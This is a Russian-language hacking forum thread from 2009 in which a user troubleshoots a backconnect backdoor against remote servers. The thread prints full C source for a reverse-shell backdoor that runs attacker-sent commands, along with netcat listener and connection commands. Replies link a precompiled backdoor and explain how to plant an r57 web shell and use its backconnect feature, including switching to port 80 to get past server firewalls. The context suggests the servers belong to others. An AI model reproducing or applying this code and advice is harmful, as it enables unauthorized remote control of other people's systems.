Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
как произвести backconnect? |
20.04.2009, 20:55
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
как произвести backconnect?
у меня не получается использовать backconnect backdoor:
беру сервер на котором с которым удаётся установить соединение через бэкдор - всё работает
отключаю у себя windows firewall, антивирус
запускаю: nc -l -p 13001
на сервере запускаю:
gcc bd.c -o bd
./bd my_ip 13001
свой ip узнаю на сайте cmyip.com, либо из коммандной строки: ipconfig
ниже код backconnect backdoor
Код:
/*
oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888....
.88...8888.........888....888....
o88o....88.o88oooo888....o888o...
*********************************
**** Network security team ******
********* nst.void.ru ***********
*********************************
* Title: nsT BackConnect Backdoor v1.0
* Date: 09.04.2006
* Usage:
* client: nc -lp 9999
* server: ./backconnect <ip_client> 9999
*********************************
*/
#include <stdlib.h>
#include <stdio.h>
#include <error.h>
#include <string.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <resolv.h>
int main (int argc, char **argv) {
struct sockaddr_in sock;
int sd;
char command[256];
if (argc < 3) {
printf("%s <host> <port>\n", argv[0]);
return 1;
}
close(1);
if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
perror(argv[0]);
return 1;
}
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(atoi(argv[2]));
inet_aton(argv[1], &sock.sin_addr);
if (connect(sd, (struct sockaddr *)&sock, sizeof(sock))) {
perror(argv[0]);
return 1;
}
close(2);
dup(sd);
bzero(command, 256);
while (recv(sd, command, 255, 0) && strncmp(command, "quit", 4)) {
system(command);
bzero(command, 256);
}
close(sd);
return 0;
}
... и соединения не происходит. В чём может быть проблема?
интернет через corbina, backconnect пробовал произвести на нескольких серверах - нигде не получилось.
Пробовал в одном окне: nc -l -p 1234, а в другом окне: nc my_ip 1234 - всё нормально работает. |
|
|
20.04.2009, 21:05
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Держи другой бэкконект.
http://rapidshare.com/files/223658318/back.html
Скомпилированный.
Не когда не подводил, всегда проканывал.
use:./back your_ip
nc:nc -l -p 4000
Возможно соеденение не идёт из-за фаера на серваке.
Режет запросы.
Если что сорцы.
http://rapidshare.com/files/223659648/back.c.html
|
|
|
|
20.04.2009, 22:19
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
не получилось. результат тот-же
Возможно соеденение не идёт из-за фаера на серваке.
как можно это обойти и совершить коннект? |
|
|
|
20.04.2009, 22:29
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
1. Залей шелл r57. Потом открой NetCat и запусти с параметром -l -n -v -p 11457
Потом в самом низу шелла r57 есть менюшка бэкконект. В поле порт вбей 11457, а в поле IP свое IP. Нажми connect.
2. Если не получается, т.е. блочит фаер. В полне возможно, что он просто блочит порты все кроме 80. Т.е. открой у себя 80 порт и пробуй на него  |
|
|
|
21.04.2009, 07:53
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
1)
D:\nc>nc -l -n -v -p 80
listening on [any] 80 ...
2)
шелл r57 -> ::Сеть:: -> back connect:
IP: мой
порт: 80
не получилось.
пробую на этом сервере: <вырезано>
Подскажите, какие ещё варианты?
Последний раз редактировалось krobol; 22.04.2009 в 17:15..
|
|
|
|
21.04.2009, 08:42
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
krobol, через r57 попробуй на другой порт. На тот, что я привел в примере. Попробуй сам открыть порт через этот шелл. Если получиться открыть порт, то на него делай бэкконект. А чтобы делать на 80, то надо его у себя открыть сначало
ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0 |
|
|
|
21.04.2009, 09:12
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
Сообщение от Tigger
ЗЫ: Зачем оставлять линк, если на шелле висит авторизация? о_0
авторизация: логин: 1, пароль: 1 - я указал в скобках
открывать порт через шелл и коннектится к нему у меня получается (если не здесь, то на других серверах точно получалось). А вот backconnect нигде не получается
Как открыть у себя 80 порт? Если: nc -l -n -v -p 80, то так я делал.
|
|
|
|
21.04.2009, 12:50
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
на своём компе набрал
> ipconfig
ответ:
corbina - PPP адаптер:
DNS-суффикс этого подключения . . :
IP-адрес . . . . . . . . . . . . : 93.80.84.170
Маска подсети . . . . . . . . . . : 255.255.255.255
Основной шлюз . . . . . . . . . . : 93.80.84.170
отключил firewall, антивирус и набрал:
> nc -l -p 33333
затем, зашёл в unix-shell (/bin/bash) на сервер. Там оказался netcat, я набрал:
$ nc 93.80.84.170 33333
и ничего не проходит. Почему?
$ ping 93.80.84.170 работает
помогите, пожалуйста, разобраться
|
|
|
|
21.04.2009, 17:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Чего-то ты тупишь =\
Я все сделал и никаких проблем нету =\
Сейчас видео сниму.
add:
Вот тут можешь скачать видео: http://webfile.ru/3431653
Последний раз редактировалось Tigger; 21.04.2009 в 17:25..
|
|
|
|
21.04.2009, 17:20
|
|
Познающий
Регистрация: 10.02.2008
Сообщений: 56
Провел на форуме:
271527
Репутация:
14
|
|
сделал на том сервере, который я указал??
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
